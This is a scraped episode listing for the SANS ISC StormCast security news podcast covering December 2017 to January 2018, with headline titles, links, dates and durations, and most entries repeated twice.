Ransomware As a Service https://isc.sans.edu/forums/diary/Ransomware+as+a+Service/23277/ libcurl Vulnerability http://seclists.org/oss-sec/2018/q1/94 Hide 'N Seek IoT Botnet https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/ Container Intrusions: Assessing the Efficacy of Intrusion Detection and Analysis Methods for Linux Container Environments https://www.sans.org/reading-room/whitepapers/detection/container-intrusions-assessing-efficacy-intrusion-detection-analysis-methods-linux-container-environments-38245
1/25/201817 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, January 26th 2018

Ransomware As a Service https://isc.sans.edu/forums/diary/Ransomware+as+a+Service/23277/ libcurl Vulnerability http://seclists.org/oss-sec/2018/q1/94 Hide 'N Seek IoT Botnet https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/ Container Intrusions: Assessing the Efficacy of Intrusion Detection and Analysis Methods for Linux Container Environments https://www.sans.org/reading-room/whitepapers/detection/container-intrusions-assessing-efficacy-intrusion-detection-analysis-methods-linux-container-environments-38245
1/25/201817 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, January 25th 2018

RTF Files For Hancitor Utilize Exploit for CVE-2017-11882 https://isc.sans.edu/forums/diary/RTF+files+for+Hancitor+utilize+exploit+for+CVE201711882/23271/ Electron Fixes Protocol Handlers Flaw https://electronjs.org/blog/protocol-handler-fix Xerox Workcenters Fudge Numbers http://www.dkriesel.com/en/blog/2013/0802_xerox-workcentres_are_switching_written_numbers_when_scanning? Tracking Users Using CSS https://github.com/jbtronics/CrookedStyleSheets
1/25/20185 minutes, 36 seconds
Episode Artwork

ISC StormCast for Thursday, January 25th 2018

RTF Files For Hancitor Utilize Exploit for CVE-2017-11882 https://isc.sans.edu/forums/diary/RTF+files+for+Hancitor+utilize+exploit+for+CVE201711882/23271/ Electron Fixes Protocol Handlers Flaw https://electronjs.org/blog/protocol-handler-fix Xerox Workcenters Fudge Numbers http://www.dkriesel.com/en/blog/2013/0802_xerox-workcentres_are_switching_written_numbers_when_scanning? Tracking Users Using CSS https://github.com/jbtronics/CrookedStyleSheets
1/25/20185 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, January 24th 2018

Apple Patches Everything, Again https://isc.sans.edu/forums/diary/Apple+Updates+Everything+Again/23269/ OpenSSL Introduces its Version of a "Patch Tuesday" https://www.openssl.org/blog/blog/2018/01/18/f2f-london/ "Rapid" Ransomware https://id-ransomware.blogspot.ru/2018/01/rapid-ransomware.html (Russian) https://www.bleepingcomputer.com/forums/t/667032/rapid-ransomware-rapid-paymeme-how-recovery-filestxt-support-topic/page-2
1/24/20185 minutes, 30 seconds
Episode Artwork

ISC StormCast for Wednesday, January 24th 2018

Apple Patches Everything, Again https://isc.sans.edu/forums/diary/Apple+Updates+Everything+Again/23269/ OpenSSL Introduces its Version of a "Patch Tuesday" https://www.openssl.org/blog/blog/2018/01/18/f2f-london/ "Rapid" Ransomware https://id-ransomware.blogspot.ru/2018/01/rapid-ransomware.html (Russian) https://www.bleepingcomputer.com/forums/t/667032/rapid-ransomware-rapid-paymeme-how-recovery-filestxt-support-topic/page-2
1/24/20185 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, January 23rd 2018

HTTPs on Every Port https://isc.sans.edu/forums/diary/HTTPS+on+every+port/23261/ Curl over TOR https://isc.sans.edu/forums/diary/Retrieving+malware+over+Tor/23257/ Spectre/Meltdown Microcode Patch Problems https://newsroom.intel.com/news/root-cause-of-reboot-issue-identified-updated-guidance-for-customers-and-partners/ https://lkml.org/lkml/2018/1/21/192 DNS Rebinding Attacks Against Geth https://ret2got.wordpress.com/2018/01/19/how-your-ethereum-can-be-stolen-using-dns-rebinding/ Chinese Quantum Cryptography Satellite Link Transmits Intercontinental Videolink https://journals.aps.org/prl/abstract/10.1103/PhysRevLett.120.030501
1/23/20185 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, January 23rd 2018

HTTPs on Every Port https://isc.sans.edu/forums/diary/HTTPS+on+every+port/23261/ Curl over TOR https://isc.sans.edu/forums/diary/Retrieving+malware+over+Tor/23257/ Spectre/Meltdown Microcode Patch Problems https://newsroom.intel.com/news/root-cause-of-reboot-issue-identified-updated-guidance-for-customers-and-partners/ https://lkml.org/lkml/2018/1/21/192 DNS Rebinding Attacks Against Geth https://ret2got.wordpress.com/2018/01/19/how-your-ethereum-can-be-stolen-using-dns-rebinding/ Chinese Quantum Cryptography Satellite Link Transmits Intercontinental Videolink https://journals.aps.org/prl/abstract/10.1103/PhysRevLett.120.030501
1/23/20185 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, January 22nd 2018

Analyzing an RTF Phishing Document https://isc.sans.edu/forums/diary/An+RTF+phish/23255/ Satori Variant Steals ETH from Miners http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/ Evrial Trojan Modifies Copy / Pasted Bitcoin Addresses https://twitter.com/malwrhunterteam/status/953313514629853184 Legal Challenges of Bug Bounties https://www.heise.de/security/meldung/US-Bug-Bountys-lassen-gute-Hacker-in-die-Falle-tappen-3946508.html
1/22/20185 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, January 22nd 2018

Analyzing an RTF Phishing Document https://isc.sans.edu/forums/diary/An+RTF+phish/23255/ Satori Variant Steals ETH from Miners http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/ Evrial Trojan Modifies Copy / Pasted Bitcoin Addresses https://twitter.com/malwrhunterteam/status/953313514629853184 Legal Challenges of Bug Bounties https://www.heise.de/security/meldung/US-Bug-Bountys-lassen-gute-Hacker-in-die-Falle-tappen-3946508.html
1/22/20185 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, January 19th 2018

Oracle E-Business Suite Server Can Be Attackt via WebLogic https://www.onapsis.com/blog/oracle-january-cpu-analysis-64-patches-affect-business-critical-applications Microsoft Resumes Patches for AMD Systems https://www.amd.com/en/corporate/speculative-execution Speculations About Yet Another CPU Attack https://skyfallattack.com Smiths Medfusion 4000 Vulnerabilities https://github.com/sgayou/medfusion-4000-research/blob/master/doc/README.md#summary
1/19/20185 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, January 19th 2018

Oracle E-Business Suite Server Can Be Attackt via WebLogic https://www.onapsis.com/blog/oracle-january-cpu-analysis-64-patches-affect-business-critical-applications Microsoft Resumes Patches for AMD Systems https://www.amd.com/en/corporate/speculative-execution Speculations About Yet Another CPU Attack https://skyfallattack.com Smiths Medfusion 4000 Vulnerabilities https://github.com/sgayou/medfusion-4000-research/blob/master/doc/README.md#summary
1/19/20185 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, January 18th 2018

Reviewing the Spam Filters: Malspam Pushing Gozi-ISFB https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245/ Auditing Secure USB Keys https://www.j-michel.org/blog/2018/01/16/attacking-secure-usb-keys-behind-the-scene Malicious Open Graph title Tag Crashes iMessage https://www.macrumors.com/2018/01/16/malicious-link-ios-mac-freezes/ BIND Fixes DoS Vulnerablity https://kb.isc.org/article/AA-01542
1/18/20185 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, January 18th 2018

Reviewing the Spam Filters: Malspam Pushing Gozi-ISFB https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245/ Auditing Secure USB Keys https://www.j-michel.org/blog/2018/01/16/attacking-secure-usb-keys-behind-the-scene Malicious Open Graph title Tag Crashes iMessage https://www.macrumors.com/2018/01/16/malicious-link-ios-mac-freezes/ BIND Fixes DoS Vulnerablity https://kb.isc.org/article/AA-01542
1/18/20185 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, January 9th 2018

WebLogic Flaw Used to Install Monero Crypto Coin Miner https://isc.sans.edu/forums/diary/Campaign+is+using+a+recently+released+WebLogic+exploit+to+deploy+a+Monero+miner/23191/ Fake Anti-Virus Pages Poppding Up Like Weeds https://isc.sans.edu/forums/diary/Fake+antivirus+pages+popping+up+like+weeds/23207/ Apple Spectre/Meltdown Patches https://support.apple.com/en-us/HT201222 Meltdown Patch Fallout https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB43600/?l=en_US&fs=Search&pn=1&atype= https://forums.sandboxie.com/phpBB3/viewtopic.php?t=25114 https://support.microsoft.com/en-us/help/4072699/january-3-2018-windows-security-updates-and-antivirus-software WPA3 Announced https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-security-enhancements
1/9/20185 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, January 9th 2018

WebLogic Flaw Used to Install Monero Crypto Coin Miner https://isc.sans.edu/forums/diary/Campaign+is+using+a+recently+released+WebLogic+exploit+to+deploy+a+Monero+miner/23191/ Fake Anti-Virus Pages Poppding Up Like Weeds https://isc.sans.edu/forums/diary/Fake+antivirus+pages+popping+up+like+weeds/23207/ Apple Spectre/Meltdown Patches https://support.apple.com/en-us/HT201222 Meltdown Patch Fallout https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB43600/?l=en_US&fs=Search&pn=1&atype= https://forums.sandboxie.com/phpBB3/viewtopic.php?t=25114 https://support.microsoft.com/en-us/help/4072699/january-3-2018-windows-security-updates-and-antivirus-software WPA3 Announced https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-security-enhancements
1/9/20185 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, January 8th 2018

Campaign is using a recently released WebLogic exploit to deploy a Monero miner https://isc.sans.edu/forums/diary/Campaign+is+using+a+recently+released+WebLogic+exploit+to+deploy+a+Monero+miner/23191/ Misc News about Meltdown and Spectre https://www.qualcomm.com/company/product-security/bulletins AMD Processor Flaw http://seclists.org/fulldisclosure/2018/Jan/12 Western Digital MyCloud Backdoor http://gulftech.org/advisories/WDMyCloud%20Multiple%20Vulnerabilities/125
1/8/20185 minutes, 14 seconds
Episode Artwork

ISC StormCast for Monday, January 8th 2018

Campaign is using a recently released WebLogic exploit to deploy a Monero miner https://isc.sans.edu/forums/diary/Campaign+is+using+a+recently+released+WebLogic+exploit+to+deploy+a+Monero+miner/23191/ Misc News about Meltdown and Spectre https://www.qualcomm.com/company/product-security/bulletins AMD Processor Flaw http://seclists.org/fulldisclosure/2018/Jan/12 Western Digital MyCloud Backdoor http://gulftech.org/advisories/WDMyCloud%20Multiple%20Vulnerabilities/125
1/8/20185 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, January 5th 2018

SANS Special Webcast https://www.sans.org/webcast/recording/citrix/106815/138095 ISC Diary with Links to Patches https://isc.sans.edu/forums/diary/Spectre+and+Meltdown+What+You+Need+to+Know+Right+Now/23193/
1/5/20187 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, January 5th 2018

SANS Special Webcast https://www.sans.org/webcast/recording/citrix/106815/138095 ISC Diary with Links to Patches https://isc.sans.edu/forums/diary/Spectre+and+Meltdown+What+You+Need+to+Know+Right+Now/23193/
1/5/20187 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, January 4th 2018

Intel CPU Vulnerablity https://meltdownattack.com Crypto Coin Mining Pool IP List https://isc.sans.edu/api/threatlist/miner Phishing to Rural America Leads to Six-figure Wire Fraud Losses https://isc.sans.edu/forums/diary/Phishing+to+Rural+America+Leads+to+Sixfigure+Wire+Fraud+Losses/23185/
1/4/20187 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, January 4th 2018

Intel CPU Vulnerablity https://meltdownattack.com Crypto Coin Mining Pool IP List https://isc.sans.edu/api/threatlist/miner Phishing to Rural America Leads to Six-figure Wire Fraud Losses https://isc.sans.edu/forums/diary/Phishing+to+Rural+America+Leads+to+Sixfigure+Wire+Fraud+Losses/23185/
1/4/20187 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, January 3rd 2018

Extracting URLs From PDFs https://isc.sans.edu/forums/diary/PDF+documents+URLs+update/23167/ Priviledge Escalation Exploit for macOS https://siguza.github.io/IOHIDeous/ 34C3: Chaos Communications Congress https://media.ccc.de/c/34c3 Vulnerabilities in Online Geolocation Services https://0x0.li/trackmageddon/
1/3/20186 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, January 3rd 2018

Extracting URLs From PDFs https://isc.sans.edu/forums/diary/PDF+documents+URLs+update/23167/ Priviledge Escalation Exploit for macOS https://siguza.github.io/IOHIDeous/ 34C3: Chaos Communications Congress https://media.ccc.de/c/34c3 Vulnerabilities in Online Geolocation Services https://0x0.li/trackmageddon/
1/3/20186 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, January 2nd 2018

Analyzing TNEF Files https://isc.sans.edu/forums/diary/Analyzing+TNEF+files/23175/ Obfuscated RTF Files https://isc.sans.edu/forums/diary/Dealing+with+obfuscated+RTF+files/23169/ 2017 Flood of CVEs https://isc.sans.edu/forums/diary/2017+The+Flood+of+CVEs/23173/ Sonos/Bose Smart Speaker Flaws https://documents.trendmicro.com/assets/pdf/The-Sound-of-a-Targeted-Attack.pdf Web Trackers Exploit Login Managers https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/ Backdoored Wordpress Plugins https://www.bleepingcomputer.com/news/security/three-more-wordpress-plugins-found-hiding-a-backdoor/
1/1/20187 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, January 2nd 2018

Analyzing TNEF Files https://isc.sans.edu/forums/diary/Analyzing+TNEF+files/23175/ Obfuscated RTF Files https://isc.sans.edu/forums/diary/Dealing+with+obfuscated+RTF+files/23169/ 2017 Flood of CVEs https://isc.sans.edu/forums/diary/2017+The+Flood+of+CVEs/23173/ Sonos/Bose Smart Speaker Flaws https://documents.trendmicro.com/assets/pdf/The-Sound-of-a-Targeted-Attack.pdf Web Trackers Exploit Login Managers https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/ Backdoored Wordpress Plugins https://www.bleepingcomputer.com/news/security/three-more-wordpress-plugins-found-hiding-a-backdoor/
1/1/20187 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, December 22nd 2017

Critical Flaw in SMBv1 Implementation of Dell EMC Data Domain DD OS http://seclists.org/fulldisclosure/2017/Dec/79 Facebook Enables Feature To Review All E-Mails Sent By Facebook https://www.facebook.com/notes/facebook-security/new-security-feature-reveals-if-facebook-mails-are-legit/10154983636230766/ EtherDelta DNS Attack https://twitter.com/etherdelta Enigmail Vulnerability https://enigmail.net/download/other/Enigmail%20Pentest%20Report%20by%20Cure53%20-%20Excerpt.pdf
12/22/20176 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, December 22nd 2017

Critical Flaw in SMBv1 Implementation of Dell EMC Data Domain DD OS http://seclists.org/fulldisclosure/2017/Dec/79 Facebook Enables Feature To Review All E-Mails Sent By Facebook https://www.facebook.com/notes/facebook-security/new-security-feature-reveals-if-facebook-mails-are-legit/10154983636230766/ EtherDelta DNS Attack https://twitter.com/etherdelta Enigmail Vulnerability https://enigmail.net/download/other/Enigmail%20Pentest%20Report%20by%20Cure53%20-%20Excerpt.pdf
12/22/20176 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, December 21st 2017

Kernel Hooking Basics https://isc.sans.edu/forums/diary/Guest+Diary+Etay+Nir+Kernel+Hooking+Basics/23155/ Intel Memory Encryption https://software.intel.com/sites/default/files/managed/a5/16/Multi-Key-Total-Memory-Encryption-Spec.pdf https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=33e63acc119d15c2fac3e3775f32d1ce7a01021b WordPress Sites Infected with Monero Miners https://www.wordfence.com/blog/2017/12/aggressive-brute-force-wordpress-attack/
12/21/20174 minutes, 51 seconds
Episode Artwork

ISC StormCast for Thursday, December 21st 2017

Kernel Hooking Basics https://isc.sans.edu/forums/diary/Guest+Diary+Etay+Nir+Kernel+Hooking+Basics/23155/ Intel Memory Encryption https://software.intel.com/sites/default/files/managed/a5/16/Multi-Key-Total-Memory-Encryption-Spec.pdf https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=33e63acc119d15c2fac3e3775f32d1ce7a01021b WordPress Sites Infected with Monero Miners https://www.wordfence.com/blog/2017/12/aggressive-brute-force-wordpress-attack/
12/21/20174 minutes, 51 seconds
Episode Artwork

ISC StormCast for Wednesday, December 20th 2017

Example of "MouseOver" Link in a Powerpoint File https://isc.sans.edu/forums/diary/Example+of+MouseOver+Link+in+a+Powerpoint+File/23149/ Adups Malware Still Haunting Android Phones https://blog.malwarebytes.com/cybercrime/2017/12/mobile-menace-monday-upping-the-ante-on-adups-fwupgradeprovider/ Popular Wordpress Captcha Included Backdoor https://www.wordfence.com/blog/2017/12/backdoor-captcha-plugin/ Comparing DNS Filters https://medium.com/@nykolas.z/dns-security-filters-compared-quad9-x-opendns-x-comodo-secure-x-norton-connectsafe-x-yandex-safe-a00ace3bf21f
12/20/20175 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, December 20th 2017

Example of "MouseOver" Link in a Powerpoint File https://isc.sans.edu/forums/diary/Example+of+MouseOver+Link+in+a+Powerpoint+File/23149/ Adups Malware Still Haunting Android Phones https://blog.malwarebytes.com/cybercrime/2017/12/mobile-menace-monday-upping-the-ante-on-adups-fwupgradeprovider/ Popular Wordpress Captcha Included Backdoor https://www.wordfence.com/blog/2017/12/backdoor-captcha-plugin/ Comparing DNS Filters https://medium.com/@nykolas.z/dns-security-filters-compared-quad9-x-opendns-x-comodo-secure-x-norton-connectsafe-x-yandex-safe-a00ace3bf21f
12/20/20175 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, December 19th 2017

Not So Malicious Word Doc https://isc.sans.edu/forums/diary/Phish+or+scam+Part+1/23141/ https://isc.sans.edu/forums/diary/Phish+or+scam+Part+2/23145/ AMF Descerializer Vulnerability http://codewhitesec.blogspot.com/2017/04/amf.html?m=1 Windows "Keeper" Password Manager Vulnerable https://bugs.chromium.org/p/project-zero/issues/detail?id=1481&desc=3 Android Malware Destroys Device https://securelist.com/jack-of-all-trades/83470/
12/19/20175 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, December 19th 2017

Not So Malicious Word Doc https://isc.sans.edu/forums/diary/Phish+or+scam+Part+1/23141/ https://isc.sans.edu/forums/diary/Phish+or+scam+Part+2/23145/ AMF Descerializer Vulnerability http://codewhitesec.blogspot.com/2017/04/amf.html?m=1 Windows "Keeper" Password Manager Vulnerable https://bugs.chromium.org/p/project-zero/issues/detail?id=1481&desc=3 Android Malware Destroys Device https://securelist.com/jack-of-all-trades/83470/
12/19/20175 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, December 18th 2017

Microsoft Office VBA Macro Obfuscation via Metadata https://isc.sans.edu/forums/diary/Microsoft+Office+VBA+Macro+Obfuscation+via+Metadata/23139/ Large Scale BGP Attack https://bgpmon.net/popular-destinations-rerouted-to-russia/ HSTS and HPKP Weaknesses in Firefox, IE/Edge and Chrome http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html
12/18/20175 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, December 18th 2017

Microsoft Office VBA Macro Obfuscation via Metadata https://isc.sans.edu/forums/diary/Microsoft+Office+VBA+Macro+Obfuscation+via+Metadata/23139/ Large Scale BGP Attack https://bgpmon.net/popular-destinations-rerouted-to-russia/ HSTS and HPKP Weaknesses in Firefox, IE/Edge and Chrome http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html
12/18/20175 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, December 15th 2017

Citizen Lab Security Planner https://securityplanner.org/ Apple Update to iOS/tvOS/iCloud (Windows) https://support.apple.com/en-us/HT201222 Fortinet Client Credentials Shared Key https://www.sec-consult.com/en/blog/advisories/vpn-credentials-disclosure-in-fortinet-forticlient/index.html Fox-It Victim of a Man-in-the-Middle Attack https://blog.fox-it.com/2017/12/14/lessons-learned-from-a-man-in-the-middle-attack/
12/15/20175 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, December 15th 2017

Citizen Lab Security Planner https://securityplanner.org/ Apple Update to iOS/tvOS/iCloud (Windows) https://support.apple.com/en-us/HT201222 Fortinet Client Credentials Shared Key https://www.sec-consult.com/en/blog/advisories/vpn-credentials-disclosure-in-fortinet-forticlient/index.html Fox-It Victim of a Man-in-the-Middle Attack https://blog.fox-it.com/2017/12/14/lessons-learned-from-a-man-in-the-middle-attack/
12/15/20175 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, December 14th 2017

Tracking Newly Registered Domains https://isc.sans.edu/forums/diary/Tracking+Newly+Registered+Domains/23127/ Critical Palo Alto Firewall Flaws Allow RCE as root http://seclists.org/fulldisclosure/2017/Dec/38 Hiding Changes from git-diff https://www.twistlock.com/2017/12/13/hiding-content-git-escape-sequence-twistlock-labs-experiment/ Apple Airport Update https://support.apple.com/en-us/HT208354
12/14/20175 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, December 14th 2017

Tracking Newly Registered Domains https://isc.sans.edu/forums/diary/Tracking+Newly+Registered+Domains/23127/ Critical Palo Alto Firewall Flaws Allow RCE as root http://seclists.org/fulldisclosure/2017/Dec/38 Hiding Changes from git-diff https://www.twistlock.com/2017/12/13/hiding-content-git-escape-sequence-twistlock-labs-experiment/ Apple Airport Update https://support.apple.com/en-us/HT208354
12/14/20175 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, December 13th 2017

Microsoft Patch Tuesday Summary https://isc.sans.edu/forums/diary/December+Microsoft+Patch+Tuesday+Summary/23123/ EV Certificate Model Broken? https://stripe.ian.sh ROBOT Attack Against TLS https://robotattack.org
12/13/20176 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, December 13th 2017

Microsoft Patch Tuesday Summary https://isc.sans.edu/forums/diary/December+Microsoft+Patch+Tuesday+Summary/23123/ EV Certificate Model Broken? https://stripe.ian.sh ROBOT Attack Against TLS https://robotattack.org
12/13/20176 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, December 12th 2017

Pornographic Spam Messages Used to Deliver Crypto Coin Miner https://isc.sans.edu/forums/diary/Pornographic+malspam+pushes+coin+miner+malware/23119/ Microsoft Leaks Secret SSL Key For Dynamics 365 https://medium.com/matthias-gliwka/microsoft-leaks-tls-private-key-for-cloud-erp-product-10b56f7d648 Proxy Botnet Used to Launch Variety of Web Application Attacks https://news.drweb.com/show/?i=11627&lng=en FoxIT Releases Utility to Recover Manipulated Windows Logs https://github.com/fox-it/danderspritz-evtx
12/12/20176 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, December 12th 2017

Pornographic Spam Messages Used to Deliver Crypto Coin Miner https://isc.sans.edu/forums/diary/Pornographic+malspam+pushes+coin+miner+malware/23119/ Microsoft Leaks Secret SSL Key For Dynamics 365 https://medium.com/matthias-gliwka/microsoft-leaks-tls-private-key-for-cloud-erp-product-10b56f7d648 Proxy Botnet Used to Launch Variety of Web Application Attacks https://news.drweb.com/show/?i=11627&lng=en FoxIT Releases Utility to Recover Manipulated Windows Logs https://github.com/fox-it/danderspritz-evtx
12/12/20176 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, December 11th 2017

Sometimes An RTF Document is Just an RTF Document https://isc.sans.edu/forums/diary/Sometimes+its+a+dud/23115/ HP Keyboard Drivers Can Log Keystrokes https://support.hp.com/us-en/document/c05827409 https://zwclose.github.io/HP-keylogger/ Android App Signature Bypass https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures MSFT Patches Antimalware Engine https://portal.msrc.microsoft.com/en-US/eula
12/11/20176 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, December 11th 2017

Sometimes An RTF Document is Just an RTF Document https://isc.sans.edu/forums/diary/Sometimes+its+a+dud/23115/ HP Keyboard Drivers Can Log Keystrokes https://support.hp.com/us-en/document/c05827409 https://zwclose.github.io/HP-keylogger/ Android App Signature Bypass https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures MSFT Patches Antimalware Engine https://portal.msrc.microsoft.com/en-US/eula
12/11/20176 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, December 8th 2017

Positive Technologies Demonstrates Intel ME Exploit at Blackhat Europe https://www.blackhat.com/docs/eu-17/materials/eu-17-Goryachy-How-To-Hack-A-Turned-Off-Computer-Or-Running-Unsigned-Code-In-Intel-Management-Engine.pdf Tracking Users Without GPS http://ieeexplore.ieee.org/document/8038870/ Process Doppelgaenger Anti-Malware Bypass https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf Friday Webcast About Recent OWASP Top 10 Update https://www.sans.org/webcasts/owasp-top-10-2017-106560
12/8/20177 minutes, 7 seconds
Episode Artwork

ISC StormCast for Friday, December 8th 2017

Positive Technologies Demonstrates Intel ME Exploit at Blackhat Europe https://www.blackhat.com/docs/eu-17/materials/eu-17-Goryachy-How-To-Hack-A-Turned-Off-Computer-Or-Running-Unsigned-Code-In-Intel-Management-Engine.pdf Tracking Users Without GPS http://ieeexplore.ieee.org/document/8038870/ Process Doppelgaenger Anti-Malware Bypass https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf Friday Webcast About Recent OWASP Top 10 Update https://www.sans.org/webcasts/owasp-top-10-2017-106560
12/8/20177 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, December 7th 2017

Apple Updates Everything https://isc.sans.edu/forums/diary/Apple+Updates+Everything+Again/23107/ Do Not Trust Reverse DNS. And here is an example why https://isc.sans.edu/forums/diary/PSA+Do+not+Trust+Reverse+DNS+and+why+does+an+address+resolve+to+localhost/23105/ NiceHash Hacked https://www.reddit.com/r/NiceHash/comments/7i0s6o/official_press_release_statement_by_nicehash/
12/6/20176 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, December 7th 2017

Apple Updates Everything https://isc.sans.edu/forums/diary/Apple+Updates+Everything+Again/23107/ Do Not Trust Reverse DNS. And here is an example why https://isc.sans.edu/forums/diary/PSA+Do+not+Trust+Reverse+DNS+and+why+does+an+address+resolve+to+localhost/23105/ NiceHash Hacked https://www.reddit.com/r/NiceHash/comments/7i0s6o/official_press_release_statement_by_nicehash/
12/6/20176 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, December 6th 2017

AI.Type Data Exposed in MongoDB Database https://mackeepersecurity.com/post/virtual-keyboard-developer-leaked-31-million-of-client-records Mailsploit Makes it Easier to Spoof From Headers in E-Mails https://www.mailsploit.com StorageCrypt Ransomware Encrypts NAS Devices https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/ Android December Update https://source.android.com/security/bulletin/2017-12-01
12/6/20175 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, December 6th 2017

AI.Type Data Exposed in MongoDB Database https://mackeepersecurity.com/post/virtual-keyboard-developer-leaked-31-million-of-client-records Mailsploit Makes it Easier to Spoof From Headers in E-Mails https://www.mailsploit.com StorageCrypt Ransomware Encrypts NAS Devices https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/ Android December Update https://source.android.com/security/bulletin/2017-12-01
12/6/20175 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, December 5th 2017

Incidence Response Using TheHive https://isc.sans.edu/forums/diary/IR+using+the+Hive+Project/23099/ SSL/TLS For Scapy https://github.com/tintinweb/scapy-ssl_tls tvOS 11.2 Released (but no details about security content yet) https://support.apple.com/en-us/HT201222 System Vendors Ship Laptops With Intel ME Disabled https://www.reddit.com/r/linuxhardware/comments/7grglm/how_to_buy_a_dell_laptop_with_the_intel_me/ http://blog.system76.com/post/168050597573/system76-me-firmware-updates-plan Hacker Falsified Jail Records To Free Friend https://www.justice.gov/usao-edmi/pr/ann-arbor-man-pleads-guilty-computer-intrusion-case SeKey: Touch ID Control for ssh-agent https://github.com/ntrippar/sekey
12/5/20176 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, December 5th 2017

Incidence Response Using TheHive https://isc.sans.edu/forums/diary/IR+using+the+Hive+Project/23099/ SSL/TLS For Scapy https://github.com/tintinweb/scapy-ssl_tls tvOS 11.2 Released (but no details about security content yet) https://support.apple.com/en-us/HT201222 System Vendors Ship Laptops With Intel ME Disabled https://www.reddit.com/r/linuxhardware/comments/7grglm/how_to_buy_a_dell_laptop_with_the_intel_me/ http://blog.system76.com/post/168050597573/system76-me-firmware-updates-plan Hacker Falsified Jail Records To Free Friend https://www.justice.gov/usao-edmi/pr/ann-arbor-man-pleads-guilty-computer-intrusion-case SeKey: Touch ID Control for ssh-agent https://github.com/ntrippar/sekey
12/5/20176 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, December 4th 2017

